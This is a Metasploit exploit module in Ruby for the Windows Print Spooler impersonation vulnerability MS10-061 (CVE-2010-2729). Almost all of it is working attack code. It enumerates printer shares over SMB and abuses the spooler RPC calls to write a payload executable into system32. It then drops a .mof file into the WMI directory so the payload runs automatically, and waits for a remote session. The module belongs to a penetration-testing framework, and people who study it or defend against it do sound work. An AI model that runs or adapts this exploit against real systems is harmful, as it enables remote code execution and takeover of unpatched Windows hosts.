## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'msf/windows_error' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Print Spooler Service Impersonation Vulnerability', 'Description' => %q{ This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild. }, 'Author' => [ 'jduck', # re-discovery, printer RPC stubs, module 'hdm' # ATSVC RPC proxy method, etc ;) ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ [ 'OSVDB', '67988' ], [ 'CVE', '2010-2729' ], [ 'MSB', 'MS10-061' ] ], 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'BadChars' => "", 'DisableNops' => true, }, 'Targets' => [ [ 'Windows Universal', { } ] ], 'DisclosureDate' => 'Sep 14 2010', 'DefaultTarget' => 0)) register_options( [ OptString.new('SMBPIPE', [ false, "The named pipe for the spooler service", "spoolss"]), OptString.new('PNAME', [ false, "The printer share name to use on the target" ]), ], self.class) end def exploit connect() login_time = Time.now smb_login() print_status("Trying target #{target.name}...") handle = dcerpc_handle('12345678-1234-abcd-EF00-0123456789ab', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # Try all of the printers :) printers = [] if (pname = datastore['PNAME']) printers << pname else res = self.simple.client.trans( "\\PIPE\\LANMAN", ( [0x00].pack('v') + "WrLeh\x00" + "B13BWz\x00" + [0x01, 65406].pack("vv") ) ) printers = [] lerror, lconv, lentries, lcount = res['Payload'].to_s[ res['Payload'].v['ParamOffset'], res['Payload'].v['ParamCount'] ].unpack("v4") data = res['Payload'].to_s[ res['Payload'].v['DataOffset'], res['Payload'].v['DataCount'] ] 0.upto(lentries - 1) do |i| sname,tmp = data[(i * 20) + 0, 14].split("\x00") stype = data[(i * 20) + 14, 2].unpack('v')[0] scoff = data[(i * 20) + 16, 2].unpack('v')[0] if ( lconv != 0) scoff -= lconv end scomm,tmp = data[scoff, data.length - scoff].split("\x00") # we only want printers next if stype != 1 printers << sname end end # Generate a payload EXE to execute exe = generate_payload_exe printers.each { |pr| pname = "\\\\#{rhost}\\#{pr}" print_status("Attempting to exploit MS10-061 via #{pname} ...") # Open the printer status,ph = open_printer_ex(pname) if status != 0 fail_with(Exploit::Failure::Unknown, "Unable to open printer: #{Msf::WindowsError.description(status)}") end print_status("Printer handle: %s" % ph.unpack('H*')) # NOTE: fname can be anything nice to write to (cwd is system32), even # directory traversal and full paths are OK. fname = rand_text_alphanumeric(14) + ".exe" write_file_contents(ph, fname, exe) # Generate a MOF file and write it so that the Windows Management Service will # execute our binary ;) mofname = rand_text_alphanumeric(14) + ".mof" mof = generate_mof(mofname, fname) write_file_contents(ph, "wbem\\mof\\#{mofname}", mof) # ClosePrinter status,ph = close_printer(ph) if status != 0 fail_with(Exploit::Failure::Unknown, "Failed to close printer: #{Msf::WindowsError.description(status)}") end break if session_created? } print_status("Everything should be set, waiting for a session...") handler cnt = 1 while session_created? == false and cnt < 25 ::IO.select(nil, nil, nil, 0.25) cnt += 1 end disconnect rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, Rex::ConnectionError fail_with(Exploit::Failure::Unknown, $!.message) end # # Use the vuln to write a file :) # def write_file_contents(ph, fname, data) doc = rand_text_alphanumeric(16+rand(16)) # StartDocPrinter status,jobid = start_doc_printer(ph, doc, fname) if status != 0 or jobid < 0 fail_with(Exploit::Failure::Unknown, "Unable to start print job: #{Msf::WindowsError.description(status)}") end print_status("Job started: 0x%x" % jobid) # WritePrinter status,wrote = write_printer(ph, data) if status != 0 or wrote != data.length fail_with(Exploit::Failure::Unknown, ('Failed to write %d bytes!' % data.length)) end print_status("Wrote %d bytes to %%SystemRoot%%\\system32\\%s" % [data.length, fname]) # EndDocPrinter status = end_doc_printer(ph) if status != 0 fail_with(Exploit::Failure::Unknown, "Failed to end print job: #{Msf::WindowsError.description(status)}") end end # # Call RpcOpenPrinterEx # def open_printer_ex(pname, machine = nil, user = nil) =begin DWORD RpcOpenPrinterEx( [in, string, unique] STRING_HANDLE pPrinterName, [out] PRINTER_HANDLE* pHandle, [in, string, unique] wchar_t* pDatatype, [in] DEVMODE_CONTAINER* pDevModeContainer, [in] DWORD AccessRequired, [in] SPLCLIENT_CONTAINER* pClientInfo ); =end # NOTE: For more information about this encoding, see the following # sections of the Open Group's C706 DCE 1.1: RPC # # 14.3.8 Unions # 14.3.10 Pointers # Algorithm for Deferral of Referents # machine ||= '' machine = NDR.uwstring(machine) user ||= '' user = NDR.uwstring(user) splclient_info = NDR.long(0) + # DWORD dwSize; machine[0,4] + # [string] wchar_t* pMachineName; user[0,4] + # [string] wchar_t* pUserName; NDR.long(7600) + # DWORD dwBuildNum NDR.long(3) + # DWORD dwMajorVersion; NDR.long(0) + # DWORD dwMinorVersion; NDR.long(9) # unsigned short wProcessorArchitecture; # Add the deferred members splclient_info << machine[4, machine.length] splclient_info << user[4, user.length] splclient_info[0,4] = NDR.long(splclient_info.length) splclient_info = # union! NDR.long(1) + # discriminant (inside copy) NDR.long(rand(0xffffffff)) + splclient_info stubdata = NDR.uwstring(pname) + # pPrinterName NDR.long(0) + # DEVMODE_CONTAINER (null) NDR.long(0) + NDR.long(0) + # AccessRequired NDR.long(0x02020000) + # SPLCLIENT_CONTAINER NDR.long(1) + # Level (must be 1) # SPLCLIENT_INFO_1 splclient_info #print_status('Sending OpenPrinterEx request...') response = dcerpc.call(69, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) #print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data)) handle = dcerpc.last_response.stub_data[0,20] status = dcerpc.last_response.stub_data[20,4].unpack('V').first return [status, handle] end nil end # # Call RpcStartDocPrinter # def start_doc_printer(handle, dname, fname, dtype = nil) =begin typedef struct _DOC_INFO_CONTAINER { DWORD Level; [switch_is(Level)] union { [case(1)] DOC_INFO_1* pDocInfo1; } DocInfo; } DOC_INFO_CONTAINER; DWORD RpcStartDocPrinter( [in] PRINTER_HANDLE hPrinter, [in] DOC_INFO_CONTAINER* pDocInfoContainer, [out] DWORD* pJobId ); =end dname = NDR.uwstring(dname) if fname fname = NDR.uwstring(fname) else fname = NDR.long(0) end if dtype dtype = NDR.uwstring(dtype) else dtype = NDR.long(0) end doc_info = dname[0, 4] + fname[0, 4] + dtype[0, 4] # Add the deferred members doc_info << dname[4, dname.length] doc_info << fname[4, fname.length] doc_info << dtype[4, dtype.length] doc_info = # Union! NDR.long(1) + NDR.long(rand(0xffffffff)) + doc_info stubdata = handle + NDR.long(1) + doc_info #print_status('Sending StartDocPrinter request...') response = dcerpc.call(17, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) #print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data)) jobid, status = dcerpc.last_response.stub_data.unpack('VV') return [status, jobid] end nil end # # Call RpcWritePrinter # def write_printer(handle, data) =begin DWORD RpcWritePrinter( [in] PRINTER_HANDLE hPrinter, [in, size_is(cbBuf)] BYTE* pBuf, [in] DWORD cbBuf, [out] DWORD* pcWritten ); =end stubdata = handle + NDR.long(data.length) + # Perhaps we need a better data type for BYTE* :) data + NDR.align(data) + NDR.long(data.length) #print_status('Sending WritePrinter request...') response = dcerpc.call(19, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) #print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data)) wrote,status = dcerpc.last_response.stub_data.unpack('VV') return [status, wrote] end nil end # # Call RpcEndDocPrinter # def end_doc_printer(handle) =begin DWORD RpcEndDocPrinter( [in] PRINTER_HANDLE* phPrinter ); =end #print_status('Sending EndDocPrinter request...') response = dcerpc.call(23, handle) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) #print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data)) status = dcerpc.last_response.stub_data[0,4].unpack('V').first return status end nil end # # Call RpcClosePrinter # def close_printer(handle) =begin DWORD RpcClosePrinter( [in, out] PRINTER_HANDLE* phPrinter ); =end #print_status('Sending ClosePrinter request...') response = dcerpc.call(29, handle) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) #print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data)) handle = dcerpc.last_response.stub_data[0,20] status = dcerpc.last_response.stub_data[20,4].unpack('V').first return [status,handle] end nil end def seconds_since_midnight(time) # .tv_sec always uses .utc (time.tv_sec % 86400) # This method uses the localtime #(time.hour * 3600) + (time.min * 60) + (time.sec) end # We have to wait a bit longer since the WMI service is a bit slow.. def wfs_delay 10 end end